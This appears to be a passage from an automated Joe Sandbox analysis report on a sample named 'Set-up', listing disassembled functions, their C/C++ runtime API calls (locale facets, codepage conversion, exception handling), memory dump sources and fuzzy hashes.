                                                                                              • Instruction ID: 3ac767c753a64f807de66b047549deaa185eb25b7f2e27a6468662b9f70c4a55
                                                                                              • Opcode Fuzzy Hash: a934b370486baac7f06e20bbe6c6c070b8e5bafa7d69d824b4d2eced167d7ba4
                                                                                              • Instruction Fuzzy Hash: 40811472514219EFCB05CF98C941DDA7BB9FF09704F404559FA15EA251E33AEB10DBA0

                                                                                              APIs
                                                                                              • ___lc_handle_func.MSVCR100 ref: 6BC3AA04
                                                                                              • ___lc_codepage_func.MSVCR100 ref: 6BC3AA0D
                                                                                              • _GetLocaleForCP.MSVCP100(?,00000001,00000001,00000000,00000000,?,6BC2249E,00000000,?,00000001,00000000), ref: 6BC3AA36
                                                                                              • ___mb_cur_max_l_func.MSVCR100(00000000,00000001,00000001,00000000,00000000,?,6BC2249E,00000000,?,00000001,00000000), ref: 6BC3AA55
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000002,?,00000000,6BC2249E,00000000,?,00000001,00000000), ref: 6BC3AA71
                                                                                              • ___mb_cur_max_l_func.MSVCR100(00000000), ref: 6BC3AA7F
                                                                                              • _errno.MSVCR100 ref: 6BC3AA8A
                                                                                              • __pctype_func.MSVCR100 ref: 6BC3AAA2
                                                                                              • ___mb_cur_max_l_func.MSVCR100(00000000,00000001,00000001,00000000,00000000,?,6BC2249E,00000000,?,00000001,00000000), ref: 6BC3AACF
                                                                                              • ___mb_cur_max_l_func.MSVCR100(00000000,6BC2249E,00000000,?,00000001,00000000), ref: 6BC3AAE6
                                                                                              • ___mb_cur_max_l_func.MSVCR100(00000000,?,00000000,?,?,00000000), ref: 6BC3AAFD
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000), ref: 6BC3AB07
                                                                                              • ___mb_cur_max_l_func.MSVCR100(00000000,?,?,00000000), ref: 6BC3AB1E
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,00000001,00000001,00000000,00000000,?,6BC2249E,00000000,?,00000001,00000000), ref: 6BC3AB39
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___mb_cur_max_l_func$ByteCharMultiWide$Locale___lc_codepage_func___lc_handle_func__pctype_func_errno
                                                                                              • String ID:
                                                                                              • API String ID: 233324532-0
                                                                                              • Opcode ID: 0cdda67a927d399f1326a60eaa7275f6eedade9d53bc7b09dbcb80012ed7dc8a
                                                                                              • Instruction ID: 52f22c3d6e4fcde7fb647e6edbfaa31c66d833262e357cce322e24d350cbc199
                                                                                              • Opcode Fuzzy Hash: 0cdda67a927d399f1326a60eaa7275f6eedade9d53bc7b09dbcb80012ed7dc8a
                                                                                              • Instruction Fuzzy Hash: B141EF32A24275AFDF014F24C845B5D7BB8FF46712F5081A5F820EA090E738CA60DFA0

                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC3C3A8
                                                                                              • _Getcvt.MSVCP100(00000008,6BC3CE1B,00000000,00000001,00000028,6BC3D09B,?,?,00000000,00000000,00000014,6BC3EC23,?,0000000C,6BC3962C,?), ref: 6BC3C3B2
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • localeconv.MSVCR100 ref: 6BC3C3BF
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC3C3DD
                                                                                                • Part of subcall function 6BC23503: strlen.MSVCR100 ref: 6BC2350E
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC3C3FA
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC3C417
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC3C434
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC3C449
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC3C45C
                                                                                              • memcpy.MSVCR100(?,$+xv,00000004,?,?,?,?,?,?,?,?), ref: 6BC3C4CF
                                                                                              • memcpy.MSVCR100(?,$+xv,00000004,?,$+xv,00000004,?,?,?,?,?,?,?,?), ref: 6BC3C4DA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Maklocstr$Maklocchrmemcpy$GetcvtH_prolog3_catch___lc_codepage_func___lc_handle_funclocaleconvstrlen
                                                                                              • String ID: $+xv
                                                                                              • API String ID: 1198873623-1686923651
                                                                                              • Opcode ID: 4d89b69c7a108e6e294d20a1ac22ec13ce77e3a0391a2ffeb3593edea2876981
                                                                                              • Instruction ID: 66ccc81d1763f29c8c82e4f5c0c3897202a2c7497063520d1b43d74932341579
                                                                                              • Opcode Fuzzy Hash: 4d89b69c7a108e6e294d20a1ac22ec13ce77e3a0391a2ffeb3593edea2876981
                                                                                              • Instruction Fuzzy Hash: 064182F0924B51AFD720CF74C891B2BBBF8AF09204F04465AE599DB940E738E7148BA5
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3CB99
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3F114,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3CBA3
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3F114,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3CBBA
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3CBC3
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT ref: 6BC3CBDD
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3F114,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC3CBF1
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3CC00
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3F114,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3CC10
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3CC16
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3F114,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3CC23
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: 7a410b1d43abc4f3193e618789836c9877b632836f2c1a282dbcefe8e279c5de
                                                                                              • Instruction ID: 800ec9e83953912975661c21d75852ec57906d4009ff83e5b8a032a8d9629d9c
                                                                                              • Opcode Fuzzy Hash: 7a410b1d43abc4f3193e618789836c9877b632836f2c1a282dbcefe8e279c5de
                                                                                              • Instruction Fuzzy Hash: 2F01A1319206399BCF01DBB0C956AEE7331AF81724F940568E120BB290FF3C9B019B61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC39AE7
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3F3CE,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC39AF1
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3F3CE,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC39B08
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC39B11
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$codecvt@GDH@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC3F3CE,?,0000000C,6BC39639,?,?,?,?,?,?,?), ref: 6BC39B2B
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3F3CE,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC39B3F
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC39B4E
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3F3CE,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC39B5E
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC39B64
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3F3CE,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC39B71
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_Getcat@?$codecvt@GetfacetGetgloballocale@locale@std@@H@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowV42@@Vfacet@locale@2@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 2050830734-3145022300
                                                                                              • Opcode ID: 54019ff60281cc33cdf1969f31ed703a85ce780ab00043fecd4998765629896d
                                                                                              • Instruction ID: 53d1f631ddfc3b156a43f483748ab07c5f430244dde5d08c18c2dc236b894998
                                                                                              • Opcode Fuzzy Hash: 54019ff60281cc33cdf1969f31ed703a85ce780ab00043fecd4998765629896d
                                                                                              • Instruction Fuzzy Hash: DC01A13292052997CF01DBB0C852AAD7335AF81728F540568E121BB290FF7C9B01DB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3CAF6
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3F0A7,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3CB00
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3F0A7,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC3CB17
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3CB20
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • messages.LIBCPMT ref: 6BC3CB3A
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3F0A7,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC3CB4E
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3CB5D
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3F0A7,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3CB6D
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3CB73
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3F0A7,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC3CB80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowmessagesstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 4221931714-3145022300
                                                                                              • Opcode ID: e60abde0a874eb2bc7dd0c4054ecd4caf418bd43957e18eef5dd02046ef45dc2
                                                                                              • Instruction ID: 4e40e959d2824acdac19dd42f8bfa4b6239a56982c98bd43ed37cad4539659fd
                                                                                              • Opcode Fuzzy Hash: e60abde0a874eb2bc7dd0c4054ecd4caf418bd43957e18eef5dd02046ef45dc2
                                                                                              • Instruction Fuzzy Hash: E501613192063997CF05DBB4C852AAE7335BF85728F940568E520BB290FB3C9B069B61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3CA53
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3CA5D
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3CA74
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3CA7D
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?,?,?,?), ref: 6BC3CA97
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC3CAAB
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3CABA
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3CACA
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3CAD0
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3CADD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_Getcat@?$time_put@_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowU?$char_traits@_V42@@V?$ostreambuf_iterator@_Vfacet@locale@2@W@std@@@std@@@std@@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 3029389365-3145022300
                                                                                              • Opcode ID: 21c7fe3a9636847d78763a07354c8a779fa425387f998952ed347dcdf7bea5a7
                                                                                              • Instruction ID: b3915e3983e1ec665bbec5205180d215d61defcf18f4d2efa6b7c178d865cfa1
                                                                                              • Opcode Fuzzy Hash: 21c7fe3a9636847d78763a07354c8a779fa425387f998952ed347dcdf7bea5a7
                                                                                              • Instruction Fuzzy Hash: 8F01C43192063997CF01DBB0C852AAE7335BF80724F940529E120BB2D0FB3C9B01DB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2A9FC
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EFCC,?), ref: 6BC2AA06
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3EFCC,?), ref: 6BC2AA1D
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC2AA26
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • numpunct.LIBCPMT ref: 6BC2AA40
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3EFCC,?), ref: 6BC2AA54
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC2AA63
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3EFCC,?), ref: 6BC2AA73
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC2AA79
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EFCC,?), ref: 6BC2AA86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrownumpunctstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1601970360-3145022300
                                                                                              • Opcode ID: 69a5356a9c9dd54933178127335dbf2ad4d56ae112de8ce0c2f166d814d4bc78
                                                                                              • Instruction ID: b024d0d1a3a334ac8665127ff07257dfb82b10d78e17f3318bb5d516f229b5ae
                                                                                              • Opcode Fuzzy Hash: 69a5356a9c9dd54933178127335dbf2ad4d56ae112de8ce0c2f166d814d4bc78
                                                                                              • Instruction Fuzzy Hash: 9D0180319216299BCF05DFB0C952AAE7335BF85724F500569E121BB2E0FB3C9B05DB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3C9B0
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EB99,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3C9BA
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3EB99,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3C9D1
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3C9DA
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT ref: 6BC3C9F4
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3EB99,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC3CA08
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3CA17
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3EB99,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3CA27
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3CA2D
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EB99,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3CA3A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: 71a86e8d598dc32a379fa921f7e6825aff46587a91508762afb02b29b94a4c75
                                                                                              • Instruction ID: bef2053aafc442c542b3851b6183584e935ec4c96a9ae44d0a787ae48dbceed7
                                                                                              • Opcode Fuzzy Hash: 71a86e8d598dc32a379fa921f7e6825aff46587a91508762afb02b29b94a4c75
                                                                                              • Instruction Fuzzy Hash: FB01A13292163997CF01DBB0C852AAEB735AF81724F940128E020BB290FB3C9B01DB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2A959
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E9EA,?), ref: 6BC2A963
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3E9EA,?), ref: 6BC2A97A
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC2A983
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • numpunct.LIBCPMT ref: 6BC2A99D
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3E9EA,?), ref: 6BC2A9B1
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC2A9C0
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3E9EA,?), ref: 6BC2A9D0
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC2A9D6
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E9EA,?), ref: 6BC2A9E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
